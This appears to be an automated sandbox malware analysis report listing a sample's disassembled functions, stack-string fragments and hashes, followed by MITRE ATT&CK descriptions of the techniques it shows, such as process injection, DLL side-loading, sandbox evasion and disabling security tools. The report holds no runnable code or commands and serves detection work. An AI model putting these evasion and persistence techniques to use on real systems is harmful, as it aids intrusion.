n, xrefs: 04008B88
\, xrefs: 04008B21
e, xrefs: 04008B4B
l, xrefs: 04008B2F
i, xrefs: 04008B8F
e, xrefs: 04008B44
r, xrefs: 04008B36
x, xrefs: 04008B28

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: de80dee9e6228d2111ef73bfd3fdc39c8b26c6ef3590c24c5458fcd762305dd0
Instruction ID: 7a8b503f7adbe82afc5e9f83d616cc5c98468d401886fb2c9b6f79bfd9b353d5
Opcode Fuzzy Hash: de80dee9e6228d2111ef73bfd3fdc39c8b26c6ef3590c24c5458fcd762305dd0
Instruction Fuzzy Hash: A62178B1D51218AEEF50DF90DC45FEEB7B9AF04708F00815CE618BA180DBB516488BA5

Function 04008AEC Relevance: 13.8, Strings: 11, Instructions: 81COMMON

Download Yara Rule

Strings

D, xrefs: 04008B7A
w, xrefs: 04008B81
r, xrefs: 04008B3D
n, xrefs: 04008B88
\, xrefs: 04008B21
e, xrefs: 04008B4B
l, xrefs: 04008B2F
i, xrefs: 04008B8F
e, xrefs: 04008B44
r, xrefs: 04008B36
x, xrefs: 04008B28

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: 4b942429c0c298434ac6e0e9b23ac3bcd856ecbcefcdf221d7d6ad162a92e671
Instruction ID: 5ad2f0732bfc7ba902bdd6fad692e719d550710661ed4903429eeb3c7b2259cc
Opcode Fuzzy Hash: 4b942429c0c298434ac6e0e9b23ac3bcd856ecbcefcdf221d7d6ad162a92e671
Instruction Fuzzy Hash: 562155B1D51218AEEF50DF90DC45BEDBBB9AF08708F10815DE6147A180DBB516488BA5

Function 04019B64 Relevance: 12.8, Strings: 10, Instructions: 342COMMON

Download Yara Rule

Strings

A, xrefs: 04019BD1
s, xrefs: 04019BED
:, xrefs: 04019BF4
:, xrefs: 04019BC6
:, xrefs: 04019C0D
P, xrefs: 04019BE6
N, xrefs: 04019BFF
I, xrefs: 04019BBF
t, xrefs: 04019BD8
m, xrefs: 04019C06

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: :$:$:$A$I$N$P$m$s$t
API String ID: 0-2304485323
Opcode ID: 001621a36278362e0de40ae8bf5a54d2e35494693015ef3717cb1a834b3ca075
Instruction ID: dfa449547a9b6f3fce02fca43b22e47a07648cd7784457272a1c3664700c743c
Opcode Fuzzy Hash: 001621a36278362e0de40ae8bf5a54d2e35494693015ef3717cb1a834b3ca075
Instruction Fuzzy Hash: FDD1D7B1910714AFEB54DBA4CC45FEEB3F9AF48708F04851DA119EB284EB78A905CF64

Function 0400FF82 Relevance: 10.1, Strings: 8, Instructions: 132COMMON

Download Yara Rule

Strings

x, xrefs: 0400FFBD
r, xrefs: 04010081
., xrefs: 0400FFB6
i, xrefs: 04010092
e, xrefs: 04010099
o, xrefs: 04010077
m, xrefs: 0401008B
P, xrefs: 0401006D

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: ddd6f945848daa696ad8bb41c9953eb6117a1f9c59e43957bc89e02742e12140
Instruction ID: d0577a596fb6f8731b044f33380a7a40f293b16eee977a68c8743df97d4c4c3e
Opcode Fuzzy Hash: ddd6f945848daa696ad8bb41c9953eb6117a1f9c59e43957bc89e02742e12140
Instruction Fuzzy Hash: DA41A6B1C10228B6FB20EBA0CD45FEE737CAF54708F408599A50D7B181EBB567488FA5

Function 0400FF84 Relevance: 10.1, Strings: 8, Instructions: 131COMMON

Download Yara Rule

Strings

x, xrefs: 0400FFBD
r, xrefs: 04010081
., xrefs: 0400FFB6
i, xrefs: 04010092
e, xrefs: 04010099
o, xrefs: 04010077
m, xrefs: 0401008B
P, xrefs: 0401006D

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: fa607d3eba8f2f9d7c6c8300a1eae9de5ac05650143849e22d1ad22785a684f2
Instruction ID: e36906c92f6740475d48cbf8c1011b87063351ecc6d51242eca2564e5d34ea19
Opcode Fuzzy Hash: fa607d3eba8f2f9d7c6c8300a1eae9de5ac05650143849e22d1ad22785a684f2
Instruction Fuzzy Hash: 1441A6B1C10228B6FB20EBA0CD44FEE737CAF54708F408599A50D7B181EBB567488FA5

Function 0401D034 Relevance: 8.9, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

c, xrefs: 0401D0A4
e, xrefs: 0401D0C0
\, xrefs: 0401D0F9
S, xrefs: 0401D0B2
L, xrefs: 0401D09D
l, xrefs: 0401D0AB
a, xrefs: 0401D0B9

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: L$S$\$a$c$e$l
API String ID: 0-3322591375
Opcode ID: 8c230eb5915da917a404be2b13d588e825748d7ee0fd67e594efc88938a96ebc
Instruction ID: 48962bc4f2c3d38257809755b22e5e0208c672ace067407d04f220935ec6a132
Opcode Fuzzy Hash: 8c230eb5915da917a404be2b13d588e825748d7ee0fd67e594efc88938a96ebc
Instruction Fuzzy Hash: BD41A7B2C00618BEDB10DFA4DC44BEEB7F8EF88314F55815AD909BB140E7716A458F98

Function 04014BF4 Relevance: 7.7, Strings: 6, Instructions: 171COMMON

Download Yara Rule

Strings

T, xrefs: 04014C31
r, xrefs: 04014C4D
P, xrefs: 04014C2A
x, xrefs: 04014C5B
f, xrefs: 04014C54
F, xrefs: 04014C46

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: c5bba1b2f07ec92b1ab142b2ff710bd13d1ca75cab51407435138ef410ff63f1
Instruction ID: 547d706bed20be512525e67acf9ecf15ba550bb3722b27d3803b165fbfeaf3d2
Opcode Fuzzy Hash: c5bba1b2f07ec92b1ab142b2ff710bd13d1ca75cab51407435138ef410ff63f1
Instruction Fuzzy Hash: 8551D370900714AAEB34DB64CD84BEBB3FCEF04309F048659A5497A1A0E7B4B588CB91

Function 04014BE5 Relevance: 7.5, Strings: 6, Instructions: 43COMMON

Download Yara Rule

Strings

T, xrefs: 04014C31
r, xrefs: 04014C4D
P, xrefs: 04014C2A
x, xrefs: 04014C5B
f, xrefs: 04014C54
F, xrefs: 04014C46

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: b2fc737131d0f1cb36ffa2d81a78581bd503c4d03376306df37c83ea1e1236f6
Instruction ID: 3d233ebb543048141d2c86698daafddf5e7e429764191c7295077a99391137a2
Opcode Fuzzy Hash: b2fc737131d0f1cb36ffa2d81a78581bd503c4d03376306df37c83ea1e1236f6
Instruction Fuzzy Hash: BB01B170D01258ABDB20EF94C9046DEBFB8FF45358F008149DC147B250D7BA5A09CBD1

Function 040148C4 Relevance: 6.5, Strings: 5, Instructions: 236COMMON

Download Yara Rule

Strings

@Ro, xrefs: 04014982
e, xrefs: 040149A8
o, xrefs: 040149A1
h, xrefs: 0401499A
, xrefs: 04014993

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $@Ro$e$h$o
API String ID: 0-2245728269
Opcode ID: 372f11d0d1fa112cb2f2fef1b89e7796851428f9c75bf25b0e13af1ce1fab400
Instruction ID: 7496a095db7806dee8d2d944c2e6705c00d63c2ecb14dd7e31c226e2e7876679
Opcode Fuzzy Hash: 372f11d0d1fa112cb2f2fef1b89e7796851428f9c75bf25b0e13af1ce1fab400
Instruction Fuzzy Hash: 068155B28111287AEB55EB90CC44FFEB3BCBF48708F048199E60976151EB746B498BA5

Function 04014304 Relevance: 6.4, Strings: 5, Instructions: 200COMMON

Download Yara Rule

Strings

, xrefs: 0401433A
l, xrefs: 04014356
u, xrefs: 04014341
o, xrefs: 04014348
i, xrefs: 0401434F

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: b9a1c808fad52da2f529a35dafb4517f950e3c86f0c65b3d9228b9e989321480
Instruction ID: 6edfab77011cf2eb3b41303154e98c9e794741ea9aaed3901acb655490c865c1
Opcode Fuzzy Hash: b9a1c808fad52da2f529a35dafb4517f950e3c86f0c65b3d9228b9e989321480
Instruction Fuzzy Hash: A4612EB2900304AFDB24DFA4DC84FEFB7F8AB88714F108559E51AA7250E774BA45CB60

Function 040142FC Relevance: 6.4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

Strings

, xrefs: 0401433A
l, xrefs: 04014356
u, xrefs: 04014341
o, xrefs: 04014348
i, xrefs: 0401434F

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: c51f4d88821da1dd7e8c8b9db3fda46f49f21365b00870aae6c57d0eba7b391e
Instruction ID: 7de4474c6a4ec000c8a74bd188f8af54d3f3f01aa75cce67a13a838d2b766b7b
Opcode Fuzzy Hash: c51f4d88821da1dd7e8c8b9db3fda46f49f21365b00870aae6c57d0eba7b391e
Instruction Fuzzy Hash: 00412DB1900308AFDB20DFA4DC84FEFBBF8EB89708F104559E555AB250D770AA45CB60

Function 040148BA Relevance: 6.4, Strings: 5, Instructions: 107COMMON

Download Yara Rule

Strings

@Ro, xrefs: 04014982
e, xrefs: 040149A8
o, xrefs: 040149A1
h, xrefs: 0401499A
, xrefs: 04014993

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $@Ro$e$h$o
API String ID: 0-2245728269
Opcode ID: 946a42dfe78363c8a73732baf2898626d5283ff9f93acbe62dada1c1e4f9bfe4
Instruction ID: d26e9c22d36d38f0a4031b7cbd97a2e5780366975a047f2100d5f47124129b75
Opcode Fuzzy Hash: 946a42dfe78363c8a73732baf2898626d5283ff9f93acbe62dada1c1e4f9bfe4
Instruction Fuzzy Hash: A8414971C00229BAEB54EBA4CC44FEEB3B8BF48708F408299D50DB7191EB7467488F95

Function 03FFD506 Relevance: 6.3, Strings: 5, Instructions: 52COMMON

Download Yara Rule

Strings

_, xrefs: 03FFD5C5
HUMI, xrefs: 03FFD58B
:, xrefs: 03FFD5D4
UXSV, xrefs: 03FFD5BC
UXSV_, xrefs: 03FFD5DF, 03FFD5E8

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: :$HUMI$UXSV$UXSV_$_
API String ID: 0-1115028047
Opcode ID: 9242b0054cc582654f55483699a01dbafa29978b0bfad8d2e8701f2dd7aad722
Instruction ID: 961a955ef40730f60c4928ce784b3156aa3abb713d8f2b59e72e646fe6bbba3b
Opcode Fuzzy Hash: 9242b0054cc582654f55483699a01dbafa29978b0bfad8d2e8701f2dd7aad722
Instruction Fuzzy Hash: 4821E2B0D002999ECB10CFDADA841DCBFB5FF04349F648518E6167F218D3359606CB99

Function 03FFD514 Relevance: 6.3, Strings: 5, Instructions: 46COMMON

Download Yara Rule

Strings

_, xrefs: 03FFD5C5
HUMI, xrefs: 03FFD58B
:, xrefs: 03FFD5D4
UXSV, xrefs: 03FFD5BC
UXSV_, xrefs: 03FFD5DF, 03FFD5E8

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: :$HUMI$UXSV$UXSV_$_
API String ID: 0-1115028047
Opcode ID: f47b6f56c4c6e7ef43f5307888e9eaa19861d89428e5e5908592eeace7a7ae28
Instruction ID: 094e0af24ce20b44e050e7894cc6c00c25d3ba6417a3fdea58ced0c992aba7fb
Opcode Fuzzy Hash: f47b6f56c4c6e7ef43f5307888e9eaa19861d89428e5e5908592eeace7a7ae28
Instruction Fuzzy Hash: 4521EFB0C003899ACB00CF96DA841DDBFB5BB04289FA08548D6163F218D3359A06CB99

Function 04002A3B Relevance: 6.3, Strings: 5, Instructions: 44COMMON

Download Yara Rule

Strings

B, xrefs: 04002AAA
DU;, xrefs: 04002A79
=AMs, xrefs: 04002A95
`RWP, xrefs: 04002A72
(FW, xrefs: 04002A56

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: (FW$=AMs$B$DU;$`RWP
API String ID: 0-1965726163
Opcode ID: 373aff969bf653e2d630ff76938a7c660051eb866d75ca8bf2fb8f667618832c
Instruction ID: 8d19a295b8bacd4f09c168fdaaad1feda342945fb8676c2c313963aacb699836
Opcode Fuzzy Hash: 373aff969bf653e2d630ff76938a7c660051eb866d75ca8bf2fb8f667618832c
Instruction Fuzzy Hash: EF0139B0C42368BADB01EF8499428DEBB78EF16248F54818AE9143B241D7710A049BE9

Function 04000FB4 Relevance: 6.3, Strings: 5, Instructions: 43COMMON

Download Yara Rule

Strings

y, xrefs: 04000FD6
}, xrefs: 04000FEE
_, xrefs: 04000FFE
;, xrefs: 04000FD2
|, xrefs: 04001006

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: ;$_$y$|$}
API String ID: 0-668221367
Opcode ID: 971bed64e46862f9b5156a55bc7b648161b8e6dbe3261b915ed68707e11e3843
Instruction ID: 164ce2c1e4f9a885e40e06096d9c3483fd90f23c41340e350114020a26dd9e10
Opcode Fuzzy Hash: 971bed64e46862f9b5156a55bc7b648161b8e6dbe3261b915ed68707e11e3843
Instruction Fuzzy Hash: 1B11C920D087CAD9DB12D7BC84086AEBF715F23224F4883D9D4F52B2D2D2795246D7A6

Function 04002A44 Relevance: 6.3, Strings: 5, Instructions: 40COMMON

Download Yara Rule

Strings

B, xrefs: 04002AAA
DU;, xrefs: 04002A79
=AMs, xrefs: 04002A95
`RWP, xrefs: 04002A72
(FW, xrefs: 04002A56

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: (FW$=AMs$B$DU;$`RWP
API String ID: 0-1965726163
Opcode ID: 0f6faac3d90312c976ce0e01e7a232c2fc0307ac6e4617830d6ad138f87dccc3
Instruction ID: ec318cb026b082abce6554ec1d02d37db163da9b063be4d4748c04c70c8f8764
Opcode Fuzzy Hash: 0f6faac3d90312c976ce0e01e7a232c2fc0307ac6e4617830d6ad138f87dccc3
Instruction Fuzzy Hash: 21014CB0C4236CBADF00EFC5E9419EEBB78EF15648F54818AE9143B341D7B50A009BA9

Function 04013F94 Relevance: 5.3, Strings: 4, Instructions: 303COMMON

Download Yara Rule

Strings

e, xrefs: 04013FD8
k, xrefs: 04013FD1
o, xrefs: 04013FCA
, xrefs: 04013FC3

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 7987676f575500b7953205a98980917630e220fe58070619508aa8581a0759b1
Instruction ID: 58891177cbb3aad9af054c0a9c96bf754b3eeff7e7a642e777a849455f5ca14e
Opcode Fuzzy Hash: 7987676f575500b7953205a98980917630e220fe58070619508aa8581a0759b1
Instruction Fuzzy Hash: 27B11BB5A00308AFDB64DFA8CC84FEFB7F9AF88704F108558F619A7250D675AA41CB50

Function 04013F91 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

e, xrefs: 04013FD8
k, xrefs: 04013FD1
o, xrefs: 04013FCA
, xrefs: 04013FC3

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 4712e64e84669b481a8d85d72e249f7c6243ac78d8860d5540762368d7593b80
Instruction ID: 3e4ff365dd0c7be88a2a7e7c9e123696eb1cbf4dbb681f7c4e2d04fb6ced1424
Opcode Fuzzy Hash: 4712e64e84669b481a8d85d72e249f7c6243ac78d8860d5540762368d7593b80
Instruction Fuzzy Hash: AB610AB5A00318AFDB64DFA4CC84FEFB7F9AF88704F108558E619A7254D771AA41CB50

Function 04013E54 Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

FALSETRUE, xrefs: 04013ED4, 04013ED9
FALSETRUE, xrefs: 04013EFC, 04013EFF
TRUE, xrefs: 04013EBE, 04013EC1
TRUE, xrefs: 04013F51

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 9c1b8e1e2ad983a4183a7fc0fb5175294957b32b4fbe03ec73454b94d6901ccc
Instruction ID: 1a89b13db1afbbbf01808026fe59452199a28c65d9f0b17d278d530f4df7e1e7
Opcode Fuzzy Hash: 9c1b8e1e2ad983a4183a7fc0fb5175294957b32b4fbe03ec73454b94d6901ccc
Instruction Fuzzy Hash: CA415D71951168BAFB11EB94DD42FEF77BDEF49608F004058FA04BA180EB746A05C7AA

Function 04013E52 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

FALSETRUE, xrefs: 04013ED4, 04013ED9
FALSETRUE, xrefs: 04013EFC, 04013EFF
TRUE, xrefs: 04013EBE, 04013EC1
TRUE, xrefs: 04013F51

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: ce320222982947075420028533e162c771ba1292cbf1f515a0da110946206b62
Instruction ID: ad1689501916b3ef44a531d2cf521d8069ed4e93b1fde791db4c69028d6a934c
Opcode Fuzzy Hash: ce320222982947075420028533e162c771ba1292cbf1f515a0da110946206b62
Instruction Fuzzy Hash: 23317C71941168BAFB11EB90DD42FEF77BDEF49608F004058FA04BA180EB746A05C7AA

Function 04010164 Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

V, xrefs: 0401023A
8, xrefs: 04010241
6, xrefs: 0401022C
M, xrefs: 04010233

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: 6$8$M$V
API String ID: 0-2135017708
Opcode ID: aacaa29432b16a5f11bb3cea4ba535e213d7678044ba86a51da91441454bb7b3
Instruction ID: 7fb5480d4b6d917fc3a5ad1899cb48421a96b6fafd77da71c1bebbe4e770f7b0
Opcode Fuzzy Hash: aacaa29432b16a5f11bb3cea4ba535e213d7678044ba86a51da91441454bb7b3
Instruction Fuzzy Hash: 3731D4B1A10219BBEF14DBA4CD41BEF77B8EF44308F004159E908B7240E775AA558BA5

Function 04011560 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

o, xrefs: 04011595
k, xrefs: 0401159C
e, xrefs: 040115A3
, xrefs: 0401158E

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 9b2efdd9ee53f8661476e6024a77df9d0b9f6f5065326ddea5ff3ed297d1ac10
Instruction ID: 81b856af84766c4c7b0b69c00d15d63fab98ddab19d334c1a6da7056805511d1
Opcode Fuzzy Hash: 9b2efdd9ee53f8661476e6024a77df9d0b9f6f5065326ddea5ff3ed297d1ac10
Instruction Fuzzy Hash: 581165B2900218ABDB14DF99DC84ADEF7B5FF08718F048319E919AF241E771A545CBA4

Function 04011564 Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

o, xrefs: 04011595
k, xrefs: 0401159C
e, xrefs: 040115A3
, xrefs: 0401158E

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: c0a071a33ffa72afcef6229d3668252a6579e33fbb48e19d71391670dd2c8f6e
Instruction ID: 8e2ba4ec6627736234d6499ce44679b2bcd906adccff9293e1095d8c7f3fdfb0
Opcode Fuzzy Hash: c0a071a33ffa72afcef6229d3668252a6579e33fbb48e19d71391670dd2c8f6e
Instruction Fuzzy Hash: 650184B2900218ABDB14DF98DC84ADEF7B9FF08318F048219E919AF241E771A544CBA4

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

